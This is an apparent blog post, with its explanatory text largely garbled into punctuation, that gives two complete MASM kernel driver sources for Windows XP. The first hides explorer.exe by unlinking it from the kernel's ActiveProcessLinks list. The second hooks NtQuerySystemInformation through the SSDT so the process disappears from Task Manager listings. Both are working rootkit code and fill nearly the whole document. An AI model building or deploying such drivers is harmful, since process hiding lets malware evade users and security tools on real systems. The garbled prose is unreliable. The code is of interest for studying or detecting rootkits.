アクティブチェーンテーブルまたはHOOK APIによるプロセスの非表示
37394 ワード
C++ code colored by C++2HTML
:dge
, , 。 XP_SP2 .
(1). (ActiveProcessLinks) , ,
, 。
;f:\masm32\bin\ml /nologo /c /coff HideProcess_ActiveProcessLinks.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:HideProcess_ActiveProcessLinks.sys /subsystem:native HideProcess_ActiveProcessLinks.obj
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\ntoskrnl.inc
include f:\masm32\include\w2k\w2kundoc.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac
_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
.data
szHide db 'explorer.exe',0
Flink dd ?
Blink dd ?
Explorer dd ?
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
local dwId,lpEprocess
local ListOffset,NameOffset
local IdOffset
local Version
; int 3
; invoke DbgPrint,$CTA0("
Entry DriverEntry
")
mov status,STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
.if eax==STATUS_SUCCESS
mov eax,pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset _DriverUnload
assume eax:nothing
;
invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov eax,Version
cmp eax,0
jne l1
mov ListOffset,0A0h
mov NameOffset,1fch
jmp l2
l1: cmp eax,1
jne exit
mov ListOffset,88h
mov NameOffset,174h
l2: invoke PsGetCurrentProcessId
mov dwId,eax
invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
mov esi,lpEprocess
add esi,ListOffset
mov edi,esi
assume edi:PLIST_ENTRY
assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
; EPROCESS
cmp edx,edi
je l4
assume esi:nothing
sub esi,ListOffset
add esi,NameOffset
invoke strcmp,esi,addr szHide
.if eax == 0
sub esi,NameOffset
add esi,ListOffset
mov Explorer,esi
assume esi:PLIST_ENTRY
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;
mov eax,[esi].Flink
mov ebx,[esi].Blink
mov [ebx].Flink,eax
mov [eax].Blink,ebx
mov Flink,eax
mov Blink,ebx
assume eax:nothing
assume ebx:nothing
invoke DbgPrint,$CTA0("
************hide process successful ***********
")
jmp l4
.endif
; EPROCESS
sub esi,NameOffset
add esi,ListOffset
assume esi:PLIST_ENTRY
mov esi,[esi].Flink
jmp l3
l4:
assume esi:nothing
assume edi:nothing
mov status,STATUS_SUCCESS
exit:
.endif
mov eax,status
ret
mov eax,STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp
;----------------------------------------------------------------------------------------------------
; D R I V E R U N L O A D
;----------------------------------------------------------------------------------------------------
_DriverUnload proc pDriverObject:PDRIVER_OBJECT
; int 3
; invoke DbgPrint,$CTA0("
Entry DriverUnload
")
pushad
mov eax,Flink
mov ebx,Explorer
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;
mov [eax].Blink,ebx
mov [ebx].Flink,eax
mov eax,Blink
mov [eax].Flink,ebx
mov [ebx].Blink,eax
popad
;
invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov eax, pDriverObject
;
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
ret
_DriverUnload endp
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
end DriverEntry
(2). taskmgr.exe, taskmgr.exe NtQuerySystemInformation ,
NtQuerySystemInformation , , 。
;f:\masm32\bin\ml /nologo /c /coff hook_NtQuerySystemInformation.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:hook_NtQuerySystemInformation.sys /subsystem:native hook_NtQuerySystemInformation.obj
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\native.inc
include f:\masm32\include\w2k\ntoskrnl.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac
;----------------------------------------------------------------------------------------------------
; D A T A
;----------------------------------------------------------------------------------------------------
.data
;
dwOldNtQuerySystemInformation dd ?
dwAddr dd ?
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return
invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
pushad
test eax,eax
jnz exit
.if SysInfoClass == SystemProcessesAndThreadsInformation
mov esi,lpSysInfo
mov ebx,esi
add esi,[esi]
@@: add esi,38h ; 38h 。
invoke RtlCompareUnicodeString,addr processname, esi, 1
.if eax== 0
invoke DbgPrint, $CTA0("
successful
")
.if dword ptr[esi-38h] == 0
mov dword ptr[ebx],0
jmp exit
.else
sub esi,38h
mov edx,[esi]
add [ebx],edx
add esi,[esi]
jmp @B
.endif
.else
sub esi,38h
cmp dword ptr[esi],0
jz exit
mov ebx,esi
add esi,[esi]
jmp @B
.endif
.endif
exit: popad
ret
NewNtQuerySystemInformation endp
;----------------------------------------------------------------------------------------------------
; H O O K F U N C
;----------------------------------------------------------------------------------------------------
HookFunction proc
pushad
; int 3
; invoke DbgPrint, $CTA0("
Entry into hoookfunction
")
; KeServiceDescriptorTabled , NtXXXX 。
mov eax, [KeServiceDescriptorTable]
mov esi, [eax]
mov esi, [esi]
; ZwQuerySystemInformation
mov eax,ZwQuerySystemInformation
inc eax
inc eax
mov eax,[eax]
mov eax,[eax]
inc eax
movzx ecx,byte ptr[eax]
sal ecx,2
add esi,ecx
mov dwAddr,esi
mov edi,dword ptr[esi]
; 。
mov dwOldNtQuerySystemInformation,edi
mov edi,offset NewNtQuerySystemInformation
;
cli
mov dword ptr[esi],edi
sti
popad
mov eax, STATUS_SUCCESS
ret
HookFunction endp
;----------------------------------------------------------------------------------------------------
; DriverUnload
;----------------------------------------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
; , 。 。
pushad
; int 3
; invoke DbgPrint, $CTA0("
Entry into DriverUnload
")
mov esi,dwAddr
mov eax,dwOldNtQuerySystemInformation
cli
mov dword ptr[esi],eax
sti
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax,pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad
ret
DriverUnload endp
;----------------------------------------------------------------------------------------------------
; D R I V E R E N T R Y
;----------------------------------------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
; int 3
; invoke DbgPrint, $CTA0("
Entry into DriverEntry
")
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
invoke HookFunction
mov status, STATUS_SUCCESS
.endif
mov eax, status
ret
DriverEntry endp
end DriverEntry
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------